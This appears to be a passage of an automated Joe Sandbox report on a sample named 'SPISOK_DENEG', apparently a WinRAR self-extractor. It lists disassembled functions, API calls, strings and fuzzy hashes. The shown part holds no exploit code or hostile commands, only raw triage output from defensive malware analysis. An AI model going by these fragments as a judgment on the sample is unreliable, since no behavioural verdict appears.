                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                            • String ID:
                                                            • API String ID: 1247370737-0
                                                            • Opcode ID: 26840ecba06d7f75d3f140732cb2fe0f0fbeee5cf34a73a7ee39cba353046168
                                                            • Instruction ID: 28613dea8f6ade8fea6c89d2c2dfc84ec7288fa9ea1f88589288eb5da637c575
                                                            • Opcode Fuzzy Hash: 26840ecba06d7f75d3f140732cb2fe0f0fbeee5cf34a73a7ee39cba353046168
                                                            • Instruction Fuzzy Hash: E441F5B1508345AFC710DF65C8849ABFBE9FB88314F00892EF5D6D2610E774E659CB62
                                                            Function 000D2210 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 468COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _swprintf.LIBCMT ref: 000D2536
                                                              • Part of subcall function 000D4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000D40A5
                                                              • Part of subcall function 000E05DA: _wcslen.LIBCMT ref: 000E05E0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: __vswprintf_c_l_swprintf_wcslen
                                                            • String ID: ;%u$x%u$xc%u
                                                            • API String ID: 3053425827-2277559157
                                                            • Opcode ID: da7e1b171758705cb18ff7ffc301dc409ee1e395c2b0a10fba7f4c1ac0e12c75
                                                            • Instruction ID: 97b11ffbd87efb9c4cc100cda7a1c06400d9d8e0b5cc4265355adc315ee40f33
                                                            • Opcode Fuzzy Hash: da7e1b171758705cb18ff7ffc301dc409ee1e395c2b0a10fba7f4c1ac0e12c75
                                                            • Instruction Fuzzy Hash: 90F1F5716083819BDB25EB248495BFE77DA6FA0300F08056FEE869B383DB749945C772
                                                            Function 000E9CFE Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: _wcslen
                                                            • String ID: </p>$</style>$<br>$<style>$>
                                                            • API String ID: 176396367-3568243669
                                                            • Opcode ID: 517290c27309ea30c52bb4f286c51648532975031ccf20811b842b023bf8773c
                                                            • Instruction ID: 9c6a1604619791a92f04c0428ea7573f88fc7219bef2d9a698ea0010e83eade3
                                                            • Opcode Fuzzy Hash: 517290c27309ea30c52bb4f286c51648532975031ccf20811b842b023bf8773c
                                                            • Instruction Fuzzy Hash: 6A5137667043B29DDB709A279C117B673E0DFA1750F69052AFAC1AB2C0FBA58C818261
                                                            Function 000FF68D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,000FFE02,00000000,00000000,00000000,00000000,00000000,?), ref: 000FF6CF
                                                            • __fassign.LIBCMT ref: 000FF74A
                                                            • __fassign.LIBCMT ref: 000FF765
                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 000FF78B
                                                            • WriteFile.KERNEL32(?,00000000,00000000,000FFE02,00000000,?,?,?,?,?,?,?,?,?,000FFE02,00000000), ref: 000FF7AA
                                                            • WriteFile.KERNEL32(?,00000000,00000001,000FFE02,00000000,?,?,?,?,?,?,?,?,?,000FFE02,00000000), ref: 000FF7E3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                            • String ID:
                                                            • API String ID: 1324828854-0
                                                            • Opcode ID: e912f27a44c67226866fef795054033b4bfc960c4ea992729870df621b95512e
                                                            • Instruction ID: e3ce222b5dc5fb0e758336e33ab888cf06b75c0611c9ace5038e31929021e8bd
                                                            • Opcode Fuzzy Hash: e912f27a44c67226866fef795054033b4bfc960c4ea992729870df621b95512e
                                                            • Instruction Fuzzy Hash: 055165B1A0024A9FDB10CFA4DC45AFEFBF8EF09350F14416AE655E7651E770AA41CBA0
                                                            Function 000F2900 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _ValidateLocalCookies.LIBCMT ref: 000F2937
                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 000F293F
                                                            • _ValidateLocalCookies.LIBCMT ref: 000F29C8
                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 000F29F3
                                                            • _ValidateLocalCookies.LIBCMT ref: 000F2A48
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                            • String ID: csm
                                                            • API String ID: 1170836740-1018135373
                                                            • Opcode ID: 72530a8d826358de3c09dad6a80dbbfa88258082f925f449b4e0be6817681131
                                                            • Instruction ID: ad61e9a4f2568e014aaaa8ca2163c96059d01c3f915a283549e6d6dc25a894dc
                                                            • Opcode Fuzzy Hash: 72530a8d826358de3c09dad6a80dbbfa88258082f925f449b4e0be6817681131
                                                            • Instruction Fuzzy Hash: 7741B330A0020CAFCF10DF69C885ABEBBF5AF44324F148055EA55AB792D7B1DA51DFA1
                                                            Function 000E9ED5 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ShowWindow.USER32(?,00000000), ref: 000E9EEE
                                                            • GetWindowRect.USER32(?,00000000), ref: 000E9F44
                                                            • ShowWindow.USER32(?,00000005,00000000), ref: 000E9FDB
                                                            • SetWindowTextW.USER32(?,00000000), ref: 000E9FE3
                                                            • ShowWindow.USER32(00000000,00000005), ref: 000E9FF9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: Window$Show$RectText
                                                            • String ID: RarHtmlClassName
                                                            • API String ID: 3937224194-1658105358
                                                            • Opcode ID: 3c0782315b756398bdc2e5292c44af9c4ac0fdb0dbf88538be979c373d474d71
                                                            • Instruction ID: 5ffcd800837135f499e2f9bbd73b583fe595ccf94682719d0b7538c00b5ddd99
                                                            • Opcode Fuzzy Hash: 3c0782315b756398bdc2e5292c44af9c4ac0fdb0dbf88538be979c373d474d71
                                                            • Instruction Fuzzy Hash: 7C412032104300EFCB209F66DC88B6BBBE8FF48311F004528F949AA152CB74EA44CB66
                                                            Function 000E9955 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: _wcslen
                                                            • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                            • API String ID: 176396367-3743748572
                                                            • Opcode ID: 22d735ad4dd65f8f1a949bd1dadb2039a1512dc7a69b39698a3e69c8e989e691
                                                            • Instruction ID: b7040a4f47cb0f63ca5a8fc195575edd20f6d37edfe2f11ed2250a921d586929
                                                            • Opcode Fuzzy Hash: 22d735ad4dd65f8f1a949bd1dadb2039a1512dc7a69b39698a3e69c8e989e691
                                                            • Instruction Fuzzy Hash: ED315E726443855ED630EB559C42BBB73E4EF50320F64442EF586672C1FBA1AD4083E2
                                                            Function 000FC8A4 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 000FC868: _free.LIBCMT ref: 000FC891
                                                            • _free.LIBCMT ref: 000FC8F2
                                                              • Part of subcall function 000F8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,000FC896,?,00000000,?,00000000,?,000FC8BD,?,00000007,?,?,000FCCBA,?), ref: 000F8DE2
                                                              • Part of subcall function 000F8DCC: GetLastError.KERNEL32(?,?,000FC896,?,00000000,?,00000000,?,000FC8BD,?,00000007,?,?,000FCCBA,?,?), ref: 000F8DF4
                                                            • _free.LIBCMT ref: 000FC8FD
                                                            • _free.LIBCMT ref: 000FC908
                                                            • _free.LIBCMT ref: 000FC95C
                                                            • _free.LIBCMT ref: 000FC967
                                                            • _free.LIBCMT ref: 000FC972
                                                            • _free.LIBCMT ref: 000FC97D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            • Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                            • Instruction ID: 0acb89a977855affc44493c602e3f9468d5692927c71a6af591799304748c9f6
                                                            • Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                            • Instruction Fuzzy Hash: 5A110D71580B0CAAE620B7B1CD07FEB7BAC9F05B40F404C15B39D66893DE65A90AF750
                                                            Function 000EE5EE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,000EE669,000EE5CC,000EE86D), ref: 000EE605
                                                            • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 000EE61B
                                                            • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 000EE630
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$HandleModule
                                                            • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                            • API String ID: 667068680-1718035505
                                                            • Opcode ID: be1267e578d73ed8d386488814294d695b0bb4e576bb76d13a85d407a11bc8e7
                                                            • Instruction ID: 90e8131bc84be03bd0c176322a32480a51e94ba2201aad3975b862c4729d9801
                                                            • Opcode Fuzzy Hash: be1267e578d73ed8d386488814294d695b0bb4e576bb76d13a85d407a11bc8e7
                                                            • Instruction Fuzzy Hash: 1CF0F6317826E66FCF714F67DC8456B22DD6B257C13000839E945F3550EB90CC945B90
                                                            Function 000E146A Relevance: 9.1, APIs: 6, Instructions: 98timeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 000E14C2
                                                              • Part of subcall function 000DB146: GetVersionExW.KERNEL32(?), ref: 000DB16B
                                                            • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 000E14E6
                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 000E1500
                                                            • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 000E1513
                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 000E1523
                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 000E1533
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: Time$File$System$Local$SpecificVersion
                                                            • String ID:
                                                            • API String ID: 2092733347-0
                                                            • Opcode ID: ad0b2f8377354467a864c81ed0837e6107e736ffb416358ccdb6dea3921c7679
                                                            • Instruction ID: b53d9ebd8a0e909bfe5a9677aab7dba7bfcabc995d4949cf14dc0aa6d6ebb5d8
                                                            • Opcode Fuzzy Hash: ad0b2f8377354467a864c81ed0837e6107e736ffb416358ccdb6dea3921c7679
                                                            • Instruction Fuzzy Hash: 2331F776208345AFC700DFA9C88499BB7E8BF9C714F004A1EF995C3610E770D549CBA6
                                                            Function 000F2AFA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLastError.KERNEL32(?,?,000F2AF1,000F02FC,000EFA34), ref: 000F2B08
                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 000F2B16
                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 000F2B2F
                                                            • SetLastError.KERNEL32(00000000,000F2AF1,000F02FC,000EFA34), ref: 000F2B81
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastValue___vcrt_
                                                            • String ID:
                                                            • API String ID: 3852720340-0
                                                            • Opcode ID: ed6d2c45d23ba00345c6c9588aca2f52bf4d53f82763a2eb26712f1a6bc10122
                                                            • Instruction ID: 4ad2c70da32495684357f9a9fe1e222cdbe461eda6c25a7fa49672dd0a30bc53
                                                            • Opcode Fuzzy Hash: ed6d2c45d23ba00345c6c9588aca2f52bf4d53f82763a2eb26712f1a6bc10122
                                                            • Instruction Fuzzy Hash: FD01B13220D3196EE6642A757C859BA3BE9EF41774F600A39FB6055CE1EF924C40B284
                                                            Function 000F97E5 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLastError.KERNEL32(?,00111030,000F4674,00111030,?,?,000F3F73,00000050,?,00111030,00000200), ref: 000F97E9
                                                            • _free.LIBCMT ref: 000F981C
                                                            • _free.LIBCMT ref: 000F9844
                                                            • SetLastError.KERNEL32(00000000,?,00111030,00000200), ref: 000F9851
                                                            • SetLastError.KERNEL32(00000000,?,00111030,00000200), ref: 000F985D
                                                            • _abort.LIBCMT ref: 000F9863
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$_free$_abort
                                                            • String ID:
                                                            • API String ID: 3160817290-0
                                                            • Opcode ID: 97e3dd9e2eb7700a44c71252a777e4d39edf127f3d4743cce8b2d8fe09ec20c4
                                                            • Instruction ID: c3d7861cbe356e9f02fb420d2f9b0a78c62043a4a22cf0ac5ddec1bc1aed7703
                                                            • Opcode Fuzzy Hash: 97e3dd9e2eb7700a44c71252a777e4d39edf127f3d4743cce8b2d8fe09ec20c4
                                                            • Instruction Fuzzy Hash: D9F0A43614060966C7523325BC0ABBB2AA99FD3BB1F290124F76892D93EE608847B565
                                                            Function 000EDC3B Relevance: 9.0, APIs: 6, Instructions: 42windowsynchronizationCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • WaitForSingleObject.KERNEL32(?,0000000A), ref: 000EDC47
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 000EDC61
                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 000EDC72
                                                            • TranslateMessage.USER32(?), ref: 000EDC7C
                                                            • DispatchMessageW.USER32(?), ref: 000EDC86
                                                            • WaitForSingleObject.KERNEL32(?,0000000A), ref: 000EDC91
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                            • String ID:
                                                            • API String ID: 2148572870-0
                                                            • Opcode ID: 7279584f758d687264ffac1e1a165a1d34ca3ec78e43d0b4b59305623c608310
                                                            • Instruction ID: 4645fc93fea4e56724d14b84032c867c6a0f376f4a17bebe4a9f80c6063a1d54
                                                            • Opcode Fuzzy Hash: 7279584f758d687264ffac1e1a165a1d34ca3ec78e43d0b4b59305623c608310
                                                            • Instruction Fuzzy Hash: 61F06272A01219BBCB206BA5EC4CDCF7FBDEF41791B104011F51AE2064D675D686C7B0
                                                            Function 000DC0C5 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 148COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 000E05DA: _wcslen.LIBCMT ref: 000E05E0
                                                              • Part of subcall function 000DB92D: _wcsrchr.LIBVCRUNTIME ref: 000DB944
                                                            • _wcslen.LIBCMT ref: 000DC197
                                                            • _wcslen.LIBCMT ref: 000DC1DF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$_wcsrchr
                                                            • String ID: .exe$.rar$.sfx
                                                            • API String ID: 3513545583-31770016
                                                            • Opcode ID: 95796a0c5b5ceb9696f3c9832f5b7c6c17ce1dedf2808efc202e0937c5279e05
                                                            • Instruction ID: 3139e94e9980233f5fa14852b337807074fab1cff00da0d84a2004b1f7f3efd5
                                                            • Opcode Fuzzy Hash: 95796a0c5b5ceb9696f3c9832f5b7c6c17ce1dedf2808efc202e0937c5279e05
                                                            • Instruction Fuzzy Hash: 3841182654036299E771AF748852EBBB7E8EF42754F14050FF9D16B2C2EBA04D81C3B5
                                                            Function 000ECE87 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 133COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetTempPathW.KERNEL32(00000800,?), ref: 000ECE9D
                                                              • Part of subcall function 000DB690: _wcslen.LIBCMT ref: 000DB696
                                                            • _swprintf.LIBCMT ref: 000ECED1
                                                              • Part of subcall function 000D4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000D40A5
                                                            • SetDlgItemTextW.USER32(?,00000066,0011946A), ref: 000ECEF1
                                                            • EndDialog.USER32(?,00000001), ref: 000ECFFE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
